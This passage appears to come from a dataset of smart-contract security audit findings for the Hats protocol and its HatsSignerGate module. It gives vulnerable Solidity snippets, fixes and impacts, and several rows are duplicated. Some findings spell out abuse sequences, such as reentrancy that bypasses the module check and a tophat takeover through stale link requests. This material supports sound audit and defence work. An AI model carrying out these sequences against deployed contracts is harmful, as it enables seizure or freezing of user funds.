of owners on the safe, it performs a check whether any of them are invalid. If they are, it swaps out the invalid owner for the new owner.\\n```\\nif (ownerCount >= maxSigs) {\\n bool swapped = _swapSigner(owners, ownerCount, maxSigs, currentSignerCount, msg.sender);\\n if (!swapped) {\\n // if there are no invalid owners, we can't add a new signer, so we revert\\n revert NoInvalidSignersToReplace();\\n }\\n}\\n```\\n\\n```\\nfunction _swapSigner(\\n address[] memory _owners,\\n uint256 _ownerCount,\\n uint256 _maxSigners,\\n uint256 _currentSignerCount,\\n address _signer\\n) internal returns (bool success) {\\n address ownerToCheck;\\n bytes memory data;\\n\\n for (uint256 i; i < _ownerCount - 1;) {\\n ownerToCheck = _owners[i];\\n\\n if (!isValidSigner(ownerToCheck)) {\\n // prep the swap\\n data = abi.encodeWithSignature(\\n ""swapOwner(address,address,address)"",\\n _findPrevOwner(_owners, ownerToCheck), // prevOwner\\n ownerToCheck, // oldOwner\\n _signer // newOwner\\n );\\n\\n // execute the swap, reverting if it fails for some reason\\n success = safe.execTransactionFromModule(\\n address(safe), // to\\n 0, // value\\n data, // data\\n Enum.Operation.Call // operation\\n );\\n\\n if (!success) {\\n revert FailedExecRemoveSigner();\\n }\\n\\n if (_currentSignerCount < _maxSigners) ++signerCount;\\n break;\\n }\\n unchecked {\\n ++i;\\n }\\n }\\n}\\n```\\n\\nThis function is intended to iterate through all the owners, check if any is no longer valid, and — if that's the case — swap it for the new one.\\nHowever, in the case that all owners are valid except for the final one, it will miss the swap and reject the new owner.\\nThis is because there is an off by one error in the loop, where it iterates through `for (uint256 i; i < _ownerCount - 1;)...`\\nThis only iterates through all the owners up until the final one, and will miss the check for the validity and possible swap of the final owner.",Perform the loop with `ownerCount` instead of `ownerCount - 1` to check all owners:\\n```\\n// Remove the line below\\n for (uint256 i; i < _ownerCount // Remove the line below\\n 1;) {\\n// Add the line below\\n for (uint256 i; i < _ownerCount ;) {\\n ownerToCheck = _owners[i];\\n // rest of code\\n}\\n```\\n,"When only the final owner is invalid, new users will not be able to claim their role as signer, even through they should.","```\\nif (ownerCount >= maxSigs) {\\n bool swapped = _swapSigner(owners, ownerCount, maxSigs, currentSignerCount, msg.sender);\\n if (!swapped) {\\n // if there are no invalid owners, we can't add a new signer, so we revert\\n revert NoInvalidSignersToReplace();\\n }\\n}\\n```\\n" +"targetThreshold can be set below minThreshold, violating important invariant",medium,"There are protections in place to ensure that `minThreshold` is not set above `targetThreshold`, because the result is that the max threshold on the safe would be less than the minimum required. However, this check is not performed when `targetThreshold` is set, which results in the same situation.\\nWhen the `minThreshold` is set on `HatsSignerGateBase.sol`, it performs an important check that `minThreshold` <= targetThreshold:\\n```\\nfunction _setMinThreshold(uint256 _minThreshold) internal {\\n if (_minThreshold > maxSigners || _minThreshold > targetThreshold) {\\n revert InvalidMinThreshold();\\n }\\n\\n minThreshold = _minThreshold;\\n}\\n```\\n\\nHowever, when `targetThreshold` is set, there is no equivalent check that it remains above minThreshold:\\n```\\nfunction _setTargetThreshold(uint256 _targetThreshold) internal {\\n if (_targetThreshold > maxSigners) {\\n revert InvalidTargetThreshold();\\n }\\n\\n targetThreshold = _targetThreshold;\\n}\\n```\\n\\nThis is a major problem, because if it is set lower than `minThreshold`, `reconcileSignerCount()` will set the safe's threshold to be this value, which is lower than the minimum, and will cause all tranasctions to fail.",Perform a check in `_setTargetThreshold()` that it is greater than or equal to minThreshold:\\n```\\nfunction _setTargetThreshold(uint256 _targetThreshold) internal {\\n// Add the line below\\n if (_targetThreshold < minThreshold) {\\n// Add the line below\\n revert InvalidTargetThreshold();\\n// Add the line below\\n }\\n if (_targetThreshold > maxSigners) {\\n revert InvalidTargetThreshold();\\n }\\n\\n targetThreshold = _targetThreshold;\\n}\\n```\\n,"Settings that are intended to be guarded are not, which can lead to parameters being set in such a way that all transactions fail.",```\\nfunction _setMinThreshold(uint256 _minThreshold) internal {\\n if (_minThreshold > maxSigners || _minThreshold > targetThreshold) {\\n revert InvalidMinThreshold();\\n }\\n\\n minThreshold = _minThreshold;\\n}\\n```\\n +Hats can be overwritten,medium,"Child hats can be created under a non-existent admin. Creating the admin allows overwriting the properties of the child-hats, which goes against the immutability of hats.\\n```\\n function _createHat(\\n uint256 _id,\\n string calldata _details,\\n uint32 _maxSupply,\\n address _eligibility,\\n address _toggle,\\n bool _mutable,\\n string calldata _imageURI\\n ) internal returns (Hat memory hat) {\\n hat.details = _details;\\n hat.maxSupply = _maxSupply;\\n hat.eligibility = _eligibility;\\n hat.toggle = _toggle;\\n hat.imageURI = _imageURI;\\n hat.config = _mutable ? uint96(3 << 94) : uint96(1 << 95);\\n _hats[_id] = hat;\\n\\n\\n emit HatCreated(_id, _details, _maxSupply, _eligibility, _toggle, _mutable, _imageURI);\\n }\\n```\\n\\nNow, the next eligible hat for this admin is 1.1.1, which is a hat that was already created and minted. This can allow the admin to change the properties of the child, even if the child hat was previously immutable. This contradicts the immutability of hats, and can be used to rug users in multiple ways, and is thus classified as high severity. This attack can be carried out by any hat wearer on their child tree, mutating their properties.","Check if admin exists, before minting by checking any of its properties against default values\\n```\\nrequire(_hats[admin].maxSupply > 0, ""Admin not created"")\\n```\\n",,"```\\n function _createHat(\\n uint256 _id,\\n string calldata _details,\\n uint32 _maxSupply,\\n address _eligibility,\\n address _toggle,\\n bool _mutable,\\n string calldata _imageURI\\n ) internal returns (Hat memory hat) {\\n hat.details = _details;\\n hat.maxSupply = _maxSupply;\\n hat.eligibility = _eligibility;\\n hat.toggle = _toggle;\\n hat.imageURI = _imageURI;\\n hat.config = _mutable ? uint96(3 << 94) : uint96(1 << 95);\\n _hats[_id] = hat;\\n\\n\\n emit HatCreated(_id, _details, _maxSupply, _eligibility, _toggle, _mutable, _imageURI);\\n }\\n```\\n" +"Unlinked tophat retains linkedTreeRequests, can be rugged",high,"When a tophat is unlinked from its admin, it is intended to regain its status as a tophat that is fully self-sovereign. However, because the `linkedTreeRequests` value isn't deleted, an independent tophat could still be vulnerable to ""takeover"" from another admin and could lose its sovereignty.\\nFor a tophat to get linked to a new tree, it calls `requestLinkTopHatToTree()` function:\\n```\\nfunction requestLinkTopHatToTree(uint32 _topHatDomain, uint256 _requestedAdminHat) external {\\n uint256 fullTopHatId = uint256(_topHatDomain) << 224; // (256 - TOPHAT_ADDRESS_SPACE);\\n\\n _checkAdmin(fullTopHatId);\\n\\n linkedTreeRequests[_topHatDomain] = _requestedAdminHat;\\n emit TopHatLinkRequested(_topHatDomain, _requestedAdminHat);\\n}\\n```\\n\\nThis creates a ""request"" to link to a given admin, which can later be approved by the admin in question:\\n```\\nfunction approveLinkTopHatToTree(uint32 _topHatDomain, uint256 _newAdminHat) external {\\n // for everything but the last hat level, check the admin of `_newAdminHat`'s theoretical child hat, since either wearer or admin of `_newAdminHat` can approve\\n if (getHatLevel(_newAdminHat) < MAX_LEVELS) {\\n _checkAdmin(buildHatId(_newAdminHat, 1));\\n } else {\\n // the above buildHatId trick doesn't work for the last hat level, so we need to explicitly check both admin and wearer in this case\\n _checkAdminOrWearer(_newAdminHat);\\n }\\n\\n // Linkages must be initiated by a request\\n if (_newAdminHat != linkedTreeRequests[_topHatDomain]) revert LinkageNotRequested();\\n\\n // remove the request -- ensures all linkages are initialized by unique requests,\\n // except for relinks (see `relinkTopHatWithinTree`)\\n delete linkedTreeRequests[_topHatDomain];\\n\\n // execute the link. Replaces existing link, if any.\\n _linkTopHatToTree(_topHatDomain, _newAdminHat);\\n}\\n```\\n\\nThis function shows that if there is a pending `linkedTreeRequests`, then the admin can use that to link the tophat into their tree and claim authority over it.\\nWhen a tophat is unlinked, it is expected to regain its sovereignty:\\n```\\nfunction unlinkTopHatFromTree(uint32 _topHatDomain) external {\\n uint256 fullTopHatId = uint256(_topHatDomain) << 224; // (256 - TOPHAT_ADDRESS_SPACE);\\n _checkAdmin(fullTopHatId);\\n\\n delete linkedTreeAdmins[_topHatDomain];\\n emit TopHatLinked(_topHatDomain, 0);\\n}\\n```\\n\\nHowever, this function does not delete `linkedTreeRequests`.\\nTherefore, the following set of actions is possible:\\nTopHat is linked to Admin A\\nAdmin A agrees to unlink the tophat\\nAdmin A calls `requestLinkTopHatToTree` with any address as the admin\\nThis call succeeds because Admin A is currently an admin for TopHat\\nAdmin A unlinks TopHat as promised\\nIn the future, the address chosen can call `approveLinkTopHatToTree` and take over admin controls for the TopHat without the TopHat's permission","In `unlinkTopHatFromTree()`, the `linkedTreeRequests` should be deleted:\\n```\\nfunction unlinkTopHatFromTree(uint32 _topHatDomain) external {\\n uint256 fullTopHatId = uint256(_topHatDomain) << 224; // (256 - TOPHAT_ADDRESS_SPACE);\\n _checkAdmin(fullTopHatId);\\n\\n delete linkedTreeAdmins[_topHatDomain];\\n// Add the line below\\n delete linkedTreeRequests[_topHatDomain];\\n emit TopHatLinked(_topHatDomain, 0);\\n}\\n```\\n","Tophats that expect to be fully self-sovereign and without any oversight can be surprisingly claimed by another admin, because settings from a previous admin remain through unlinking.","```\\nfunction requestLinkTopHatToTree(uint32 _topHatDomain, uint256 _requestedAdminHat) external {\\n uint256 fullTopHatId = uint256(_topHatDomain) << 224; // (256 - TOPHAT_ADDRESS_SPACE);\\n\\n _checkAdmin(fullTopHatId);\\n\\n linkedTreeRequests[_topHatDomain] = _requestedAdminHat;\\n emit TopHatLinkRequested(_topHatDomain, _requestedAdminHat);\\n}\\n```\\n" +Safe can be bricked because threshold is updated with validSignerCount instead of newThreshold,high,"The safe's threshold is supposed to be set with the lower value of the `validSignerCount` and the `targetThreshold` (intended to serve as the maximum). However, the wrong value is used in the call to the safe's function, which in some circumstances can lead to the safe being permanently bricked.\\nIn `reconcileSignerCount()`, the valid signer count is calculated. We then create a value called `newThreshold`, and set it to the minimum of the valid signer count and the target threshold. This is intended to be the value that we update the safe's threshold with.\\n```\\nif (validSignerCount <= target && validSignerCount != currentThreshold) {\\n newThreshold = validSignerCount;\\n} else if (validSignerCount > target && currentThreshold < target) {\\n newThreshold = target;\\n}\\n```\\n\\nHowever, there is a typo in the contract call, which accidentally uses `validSignerCount` instead of `newThreshold`.\\nThe result is that, if there are more valid signers than the `targetThreshold` that was set, the threshold will be set higher than intended, and the threshold check in `checkAfterExecution()` will fail for being above the max, causing all safe transactions to revert.\\nThis is a major problem because it cannot necessarily be fixed. In the event that it is a gate with a single hat signer, and the eligibility module for the hat doesn't have a way to turn off eligibility, there will be no way to reduce the number of signers. If this number is greater than `maxSigners`, there is no way to increase `targetThreshold` sufficiently to stop the reverting.\\nThe result is that the safe is permanently bricked, and will not be able to perform any transactions.","Change the value in the function call from `validSignerCount` to `newThreshold`.\\n```\\nif (newThreshold > 0) {\\n// Remove the line below\\n bytes memory data = abi.encodeWithSignature(""changeThreshold(uint256)"", validSignerCount);\\n// Add the line below\\n bytes memory data = abi.encodeWithSignature(""changeThreshold(uint256)"", newThreshold);\\n\\n bool success = safe.execTransactionFromModule(\\n address(safe), // to\\n 0, // value\\n data, // data\\n Enum.Operation.Call // operation\\n );\\n\\n if (!success) {\\n revert FailedExecChangeThreshold();\\n }\\n}\\n```\\n","All transactions will revert until `validSignerCount` can be reduced back below `targetThreshold`, which re",```\\nif (validSignerCount <= target && validSignerCount != currentThreshold) {\\n newThreshold = validSignerCount;\\n} else if (validSignerCount > target && currentThreshold < target) {\\n newThreshold = target;\\n}\\n```\\n +Signers can bypass checks to add new modules to a safe by abusing reentrancy,high,"The `checkAfterExecution()` function has checks to ensure that new modules cannot be added by signers. This is a crucial check, because adding a new module could give them unlimited power to make any changes (with no guards in place) in the future. However, by abusing reentrancy, the parameters used by the check can be changed so that this crucial restriction is violated.\\nThe `checkAfterExecution()` is intended to uphold important invariants after each signer transaction is completed. This is intended to restrict certain dangerous signer behaviors, the most important of which is adding new modules. This was an issue caught in the previous audit and fixed by comparing the hash of the modules before execution to the has of the modules after.\\nBefore:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount);\\n_existingModulesHash = keccak256(abi.encode(modules));\\n```\\n\\nAfter:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount + 1);\\nif (keccak256(abi.encode(modules)) != _existingModulesHash) {\\n revert SignersCannotChangeModules();\\n}\\n```\\n\\nThis is further emphasized in the comments, where it is specified:\\n/// @notice Post-flight check to prevent `safe` signers from removing this contract guard, changing any modules, or changing the threshold\\nWhy Restricting Modules is Important\\nModules are the most important thing to check. This is because modules have unlimited power not only to execute transactions but to skip checks in the future. Creating an arbitrary new module is so bad that it is equivalent to the other two issues together: getting complete control over the safe (as if threshold was set to 1) and removing the guard (because they aren't checked in module transactions).\\nHowever, this important restriction can be violated by abusing reentrancy into this function.\\nReentrancy Disfunction\\nTo see how this is possible, we first have to take a quick detour regarding reentrancy. It appears that the protocol is attempting to guard against reentrancy with the `guardEntries` variable. It is incremented in `checkTransaction()` (before a transaction is executed) and decremented in `checkAfterExecution()` (after the transaction has completed).\\nThe only protection it provides is in its risk of underflowing, explained in the comments as:\\n// leave checked to catch underflows triggered by re-erntry attempts\\nHowever, any attempt to reenter and send an additional transaction midstream of another transaction would first trigger the `checkTransaction()` function. This would increment `_guardEntries` and would lead to it not underflowing.\\nIn order for this system to work correctly, the `checkTransaction()` function should simply set `_guardEntries = 1`. This would result in an underflow with the second decrement. But, as it is currently designed, there is no reentrancy protection.\\nUsing Reentrancy to Bypass Module Check\\nRemember that the module invariant is upheld by taking a snapshot of the hash of the modules in `checkTransaction()` and saving it in the `_existingModulesHash` variable.\\nHowever, imagine the following set of transactions:\\nSigners send a transaction via the safe, and modules are snapshotted to `_existingModulesHash`\\nThe transaction uses the Multicall functionality of the safe, and performs the following actions:\\nFirst, it adds the malicious module to the safe\\nThen, it calls `execTransaction()` on itself with any another transaction\\nThe second call will call `checkTransaction()`\\nThis will update `_existingModulesHash` to the new list of modules, including the malicious one\\nThe second call will execute, which doesn't matter (could just be an empty transaction)\\nAfter the transaction, `checkAfterExecution()` will be called, and the modules will match\\nAfter the full transaction is complete, `checkAfterExecution()` will be called for the first transaction, but since `_existingModulesHash` will be overwritten, the module check will pass","Use a more typical reentrancy guard format, such as checking to ensure `_guardEntries == 0` at the top of `checkTransaction()` or simply setting `_guardEntries = 1` in `checkTransaction()` instead of incrementing it.",Any number of signers who are above the threshold will be able to give themselves unlimited access over the safe with no restriction going forward.,"```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount);\\n_existingModulesHash = keccak256(abi.encode(modules));\\n```\\n" +"If another module adds a module, the safe will be bricked",high,"If a module is added by another module, it will bypass the `enableNewModule()` function that increments `enabledModuleCount`. This will throw off the module validation in `checkTransaction()` and `checkAfterExecution()` and could cause the safe to become permanently bricked.\\nIn order to ensure that signers cannot add new modules to the safe (thus giving them unlimited future governing power), the guard portion of the gate checks that the hash of the modules before the transaction is the same as the hash after.\\nBefore:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount);\\n_existingModulesHash = keccak256(abi.encode(modules));\\n```\\n\\nAfter:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount + 1);\\nif (keccak256(abi.encode(modules)) != _existingModulesHash) {\\n revert SignersCannotChangeModules();\\n}\\n```\\n\\nYou'll note that the ""before"" check uses `enabledModuleCount` and the ""after"" check uses `enabledModuleCount + 1`. The reason for this is that we want to be able to catch whether the user added a new module, which requires us taking a larger pagination to make sure we can view the additional module.\\nHowever, if we were to start with a number of modules larger than `enabledModuleCount`, the result would be that the ""before"" check would clip off the final modules, and the ""after"" check would include them, thus leading to different hashes.\\nThis situation can only arise if a module is added that bypasses the `enableModule()` function. But this exact situation can happen if one of the other modules on the safe adds a module to the safe.\\nIn this case, the modules on the safe will increase but `enabledModuleCount` will not. This will lead to the ""before"" and ""after"" checks returning different arrays each time, and therefore disallowing transactions.\\nThe only possible ways to fix this problem will be to have the other module remove the additional one they added. But, depending on the specific circumstances, this option may not be possible. For example, the module that performed the adding may not have the ability to remove modules.","The module guarding logic needs to be rethought. Given the large number of unbounded risks it opens up, I would recommend not allowing other modules on any safes that use this functionality.","The safe can be permanently bricked, with the guard functions disallowing any transactions. All funds in the safe will remain permanently stuck.","```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount);\\n_existingModulesHash = keccak256(abi.encode(modules));\\n```\\n" +Signers can brick safe by adding unlimited additional signers while avoiding checks,high,"There are a number of checks in `checkAfterExecution()` to ensure that the signers cannot perform any illegal actions to exert too much control over the safe. However, there is no check to ensure that additional owners are not added to the safe. This could be done in a way that pushes the total over `maxSigners`, which will cause all future transactions to revert.\\nThis means that signers can easily collude to freeze the contract, giving themselves the power to hold the protocol ransom to unfreeze the safe and all funds inside it.\\nWhen new owners are added to the contract through the `claimSigner()` function, the total number of owners is compared to `maxSigners` to ensure it doesn't exceed it.\\nHowever, owners can also be added by a normal `execTransaction` function. In this case, there are very few checks (all of which could easily or accidentally be missed) to stop us from adding too many owners:\\n```\\nif (safe.getThreshold() != _getCorrectThreshold()) {\\n revert SignersCannotChangeThreshold();\\n}\\n\\nfunction _getCorrectThreshold() internal view returns (uint256 _threshold) {\\n uint256 count = _countValidSigners(safe.getOwners());\\n uint256 min = minThreshold;\\n uint256 max = targetThreshold;\\n if (count < min) _threshold = min;\\n else if (count > max) _threshold = max;\\n else _threshold = count;\\n}\\n```\\n\\nThat means that either in the case that (a) the safe's threshold is already at `targetThreshold` or (b) the owners being added are currently toggled off or have eligibility turned off, this check will pass and the owners will be added.\\nOnce they are added, all future transactions will fail. Each time a transaction is processed, `checkTransaction()` is called, which calls `reconcileSignerCount()`, which has the following check:\\n```\\nif (validSignerCount > maxSigners) {\\n revert MaxSignersReached();\\n}\\n```\\n\\nThis will revert as long as the new owners are now activated as valid signers.\\nIn the worst case scenario, valid signers wearing an immutable hat are added as owners when the safe's threshold is already above `targetThreshold`. The check passes, but the new owners are already valid signers. There is no admin action that can revoke the validity of their hats, so the `reconcileSignerCount()` function will always revert, and therefore the safe is unusable.\\nSince `maxSigners` is immutable and can't be changed, the only solution is for the hat wearers to renounce their hats. Otherwise, the safe will remain unusable with all funds trapped inside.",There should be a check in `checkAfterExecution()` that ensures that the number of owners on the safe has not changed throughout the execution.\\nIt also may be recommended that the `maxSigners` value is adjustable by the contract owner.,"Signers can easily collude to freeze the contract, giving themselves the power to hold the protocol ransom to unfreeze the safe and all funds inside it.\\nIn a less malicious case, signers might accidentally add too many owners and end up needing to manage the logistics of having users renounce their hats.",```\\nif (safe.getThreshold() != _getCorrectThreshold()) {\\n revert SignersCannotChangeThreshold();\\n}\\n\\nfunction _getCorrectThreshold() internal view returns (uint256 _threshold) {\\n uint256 count = _countValidSigners(safe.getOwners());\\n uint256 min = minThreshold;\\n uint256 max = targetThreshold;\\n if (count < min) _threshold = min;\\n else if (count > max) _threshold = max;\\n else _threshold = count;\\n}\\n```\\n +HatsSignerGate + MultiHatsSignerGate: more than maxSignatures can be claimed which leads to DOS in reconcileSignerCount,high,"The `HatsSignerGate.claimSigner` and `MultiHatsSignerGate.claimSigner` functions allow users to become signers.\\nIt is important that both functions do not allow that there exist more valid signers than `maxSigners`.\\nThis is because if there are more valid signers than `maxSigners`, any call to `HatsSignerGateBase.reconcileSignerCount` reverts, which means that no transactions can be executed.\\nThe only possibility to resolve this is for a valid signer to give up his signer hat. No signer will voluntarily give up his signer hat. And it is wrong that a signer must give it up. Valid signers that have claimed before `maxSigners` was reached should not be affected by someone trying to become a signer and exceeding `maxSigners`. In other words the situation where one of the signers needs to give up his signer hat should have never occurred in the first place.\\nThink of the following scenario:\\n`maxSignatures=10` and there are 10 valid signers\\nThe signers execute a transaction that calls `Safe.addOwnerWithThreshold` such that there are now 11 owners (still there are 10 valid signers)\\nOne of the 10 signers is no longer a wearer of the hat and `reconcileSignerCount` is called. So there are now 9 valid signers and 11 owners\\nThe signer that was no longer a wearer of the hat in the previous step now wears the hat again. However `reconcileSignerCount` is not called. So there are 11 owners and 10 valid signers. The HSG however still thinks there are 9 valid signers.\\nWhen a new signer now calls `claimSigner`, all checks will pass and he will be swapped for the owner that is not a valid signer:\\n```\\n // 9 >= 10 is false\\n if (currentSignerCount >= maxSigs) {\\n revert MaxSignersReached();\\n }\\n\\n // msg.sender is a new signer so he is not yet owner\\n if (safe.isOwner(msg.sender)) {\\n revert SignerAlreadyClaimed(msg.sender);\\n }\\n\\n // msg.sender is a valid signer, he wears the signer hat\\n if (!isValidSigner(msg.sender)) {\\n revert NotSignerHatWearer(msg.sender);\\n }\\n```\\n\\nSo there are now 11 owners and 11 valid signers. This means when `reconcileSignerCount` is called, the following lines cause a revert:\\n```\\n function reconcileSignerCount() public {\\n address[] memory owners = safe.getOwners();\\n uint256 validSignerCount = _countValidSigners(owners);\\n\\n // 11 > 10\\n if (validSignerCount > maxSigners) {\\n revert MaxSignersReached();\\n }\\n```\\n","The `HatsSignerGate.claimSigner` and `MultiHatsSignerGate.claimSigner` functions should call `reconcileSignerCount` such that they work with the correct amount of signers and the scenario described in this report cannot occur.\\n```\\ndiff --git a/src/HatsSignerGate.sol b/src/HatsSignerGate.sol\\nindex 7a02faa..949d390 100644\\n--- a/src/HatsSignerGate.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/src/HatsSignerGate.sol\\n@@ -34,6 // Add the line below\\n34,8 @@ contract HatsSignerGate is HatsSignerGateBase {\\n /// @notice Function to become an owner on the safe if you are wearing the signers hat\\n /// @dev Reverts if `maxSigners` has been reached, the caller is either invalid or has already claimed. Swaps caller with existing invalid owner if relevant.\\n function claimSigner() public virtual {\\n// Add the line below\\n reconcileSignerCount();\\n// Add the line below\\n\\n uint256 maxSigs = maxSigners; // save SLOADs\\n uint256 currentSignerCount = signerCount;\\n```\\n\\n```\\ndiff --git a/src/MultiHatsSignerGate.sol b/src/MultiHatsSignerGate.sol\\nindex da74536..57041f6 100644\\n--- a/src/MultiHatsSignerGate.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/src/MultiHatsSignerGate.sol\\n@@ -39,6 // Add the line below\\n39,8 @@ contract MultiHatsSignerGate is HatsSignerGateBase {\\n /// @dev Reverts if `maxSigners` has been reached, the caller is either invalid or has already claimed. Swaps caller with existing invalid owner if relevant.\\n /// @param _hatId The hat id to claim signer rights for\\n function claimSigner(uint256 _hatId) public {\\n// Add the line below\\n reconcileSignerCount();\\n// Add the line below\\n \\n uint256 maxSigs = maxSigners; // save SLOADs\\n uint256 currentSignerCount = signerCount;\\n```\\n","As mentioned before, we end up in a situation where one of the valid signers has to give up his signer hat in order for the HSG to become operable again.\\nSo one of the valid signers that has rightfully claimed his spot as a signer may lose his privilege to sign transactions.","```\\n // 9 >= 10 is false\\n if (currentSignerCount >= maxSigs) {\\n revert MaxSignersReached();\\n }\\n\\n // msg.sender is a new signer so he is not yet owner\\n if (safe.isOwner(msg.sender)) {\\n revert SignerAlreadyClaimed(msg.sender);\\n }\\n\\n // msg.sender is a valid signer, he wears the signer hat\\n if (!isValidSigner(msg.sender)) {\\n revert NotSignerHatWearer(msg.sender);\\n }\\n```\\n" +Signers can bypass checks and change threshold within a transaction,high,"The `checkAfterExecution()` function has checks to ensure that the safe's threshold isn't changed by a transaction executed by signers. However, the parameters used by the check can be changed midflight so that this crucial restriction is violated.\\nThe `checkAfterExecution()` is intended to uphold important invariants after each signer transaction is completed. This is intended to restrict certain dangerous signer behaviors. From the docs:\\n/// @notice Post-flight check to prevent `safe` signers from removing this contract guard, changing any modules, or changing the threshold\\nHowever, the restriction that the signers cannot change the threshold can be violated.\\nTo see how this is possible, let's check how this invariant is upheld. The following check is performed within the function:\\n```\\nif (safe.getThreshold() != _getCorrectThreshold()) {\\n revert SignersCannotChangeThreshold();\\n}\\n```\\n\\nIf we look up `_getCorrectThreshold()`, we see the following:\\n```\\nfunction _getCorrectThreshold() internal view returns (uint256 _threshold) {\\n uint256 count = _countValidSigners(safe.getOwners());\\n uint256 min = minThreshold;\\n uint256 max = targetThreshold;\\n if (count < min) _threshold = min;\\n else if (count > max) _threshold = max;\\n else _threshold = count;\\n}\\n```\\n\\nAs we can see, this means that the safe's threshold after the transaction must equal the valid signers, bounded by the `minThreshold` and `maxThreshold`.\\nHowever, this check does not ensure that the value returned by `_getCorrectThreshold()` is the same before and after the transaction. As a result, as long as the number of owners is also changed in the transaction, the condition can be upheld.\\nTo illustrate, let's look at an example:\\nBefore the transaction, there are 8 owners on the vault, all signers. targetThreshold == 10 and minThreshold == 2, so the safe's threshold is 8 and everything is good.\\nThe transaction calls `removeOwner()`, removing an owner from the safe and adjusting the threshold down to 7.\\nAfter the transaction, there will be 7 owners on the vault, all signers, the safe's threshold will be 7, and the check will pass.\\nThis simple example focuses on using `removeOwner()` once to decrease the threshold. However, it is also possible to use the safe's multicall functionality to call `removeOwner()` multiple times, changing the threshold more dramatically.","Save the safe's current threshold in `checkTransaction()` before the transaction has executed, and compare the value after the transaction to that value from storage.","Signers can change the threshold of the vault, giving themselves increased control over future transactions and breaking an important trust assumption of the protocol.",```\\nif (safe.getThreshold() != _getCorrectThreshold()) {\\n revert SignersCannotChangeThreshold();\\n}\\n```\\n +Hats can be overwritten,medium,"Child hats can be created under a non-existent admin. Creating the admin allows overwriting the properties of the child-hats, which goes against the immutability of hats.\\n```\\n function _createHat(\\n uint256 _id,\\n string calldata _details,\\n uint32 _maxSupply,\\n address _eligibility,\\n address _toggle,\\n bool _mutable,\\n string calldata _imageURI\\n ) internal returns (Hat memory hat) {\\n hat.details = _details;\\n hat.maxSupply = _maxSupply;\\n hat.eligibility = _eligibility;\\n hat.toggle = _toggle;\\n hat.imageURI = _imageURI;\\n hat.config = _mutable ? uint96(3 << 94) : uint96(1 << 95);\\n _hats[_id] = hat;\\n\\n\\n emit HatCreated(_id, _details, _maxSupply, _eligibility, _toggle, _mutable, _imageURI);\\n }\\n```\\n\\nNow, the next eligible hat for this admin is 1.1.1, which is a hat that was already created and minted. This can allow the admin to change the properties of the child, even if the child hat was previously immutable. This contradicts the immutability of hats, and can be used to rug users in multiple ways, and is thus classified as high severity. This attack can be carried out by any hat wearer on their child tree, mutating their properties.","Check if admin exists, before minting by checking any of its properties against default values\\n```\\nrequire(_hats[admin].maxSupply > 0, ""Admin not created"")\\n```\\n",,"```\\n function _createHat(\\n uint256 _id,\\n string calldata _details,\\n uint32 _maxSupply,\\n address _eligibility,\\n address _toggle,\\n bool _mutable,\\n string calldata _imageURI\\n ) internal returns (Hat memory hat) {\\n hat.details = _details;\\n hat.maxSupply = _maxSupply;\\n hat.eligibility = _eligibility;\\n hat.toggle = _toggle;\\n hat.imageURI = _imageURI;\\n hat.config = _mutable ? uint96(3 << 94) : uint96(1 << 95);\\n _hats[_id] = hat;\\n\\n\\n emit HatCreated(_id, _details, _maxSupply, _eligibility, _toggle, _mutable, _imageURI);\\n }\\n```\\n" +"targetThreshold can be set below minThreshold, violating important invariant",medium,"There are protections in place to ensure that `minThreshold` is not set above `targetThreshold`, because the result is that the max threshold on the safe would be less than the minimum required. However, this check is not performed when `targetThreshold` is set, which results in the same situation.\\nWhen the `minThreshold` is set on `HatsSignerGateBase.sol`, it performs an important check that `minThreshold` <= targetThreshold:\\n```\\nfunction _setMinThreshold(uint256 _minThreshold) internal {\\n if (_minThreshold > maxSigners || _minThreshold > targetThreshold) {\\n revert InvalidMinThreshold();\\n }\\n\\n minThreshold = _minThreshold;\\n}\\n```\\n\\nHowever, when `targetThreshold` is set, there is no equivalent check that it remains above minThreshold:\\n```\\nfunction _setTargetThreshold(uint256 _targetThreshold) internal {\\n if (_targetThreshold > maxSigners) {\\n revert InvalidTargetThreshold();\\n }\\n\\n targetThreshold = _targetThreshold;\\n}\\n```\\n\\nThis is a major problem, because if it is set lower than `minThreshold`, `reconcileSignerCount()` will set the safe's threshold to be this value, which is lower than the minimum, and will cause all tranasctions to fail.",Perform a check in `_setTargetThreshold()` that it is greater than or equal to minThreshold:\\n```\\nfunction _setTargetThreshold(uint256 _targetThreshold) internal {\\n// Add the line below\\n if (_targetThreshold < minThreshold) {\\n// Add the line below\\n revert InvalidTargetThreshold();\\n// Add the line below\\n }\\n if (_targetThreshold > maxSigners) {\\n revert InvalidTargetThreshold();\\n }\\n\\n targetThreshold = _targetThreshold;\\n}\\n```\\n,"Settings that are intended to be guarded are not, which can lead to parameters being set in such a way that all transactions fail.",```\\nfunction _setMinThreshold(uint256 _minThreshold) internal {\\n if (_minThreshold > maxSigners || _minThreshold > targetThreshold) {\\n revert InvalidMinThreshold();\\n }\\n\\n minThreshold = _minThreshold;\\n}\\n```\\n +Swap Signer fails if final owner is invalid due to off by one error in loop,medium,"New users attempting to call `claimSigner()` when there is already a full slate of owners are supposed to kick any invalid owners off the safe in order to swap in and take their place. However, the loop that checks this has an off-by-one error that misses checking the final owner.\\nWhen `claimSigner()` is called, it adds the `msg.sender` as a signer, as long as there aren't already too many owners on the safe.\\nHowever, in the case that there are already the maximum number of owners on the safe, it performs a check whether any of them are invalid. If they are, it swaps out the invalid owner for the new owner.\\n```\\nif (ownerCount >= maxSigs) {\\n bool swapped = _swapSigner(owners, ownerCount, maxSigs, currentSignerCount, msg.sender);\\n if (!swapped) {\\n // if there are no invalid owners, we can't add a new signer, so we revert\\n revert NoInvalidSignersToReplace();\\n }\\n}\\n```\\n\\n```\\nfunction _swapSigner(\\n address[] memory _owners,\\n uint256 _ownerCount,\\n uint256 _maxSigners,\\n uint256 _currentSignerCount,\\n address _signer\\n) internal returns (bool success) {\\n address ownerToCheck;\\n bytes memory data;\\n\\n for (uint256 i; i < _ownerCount - 1;) {\\n ownerToCheck = 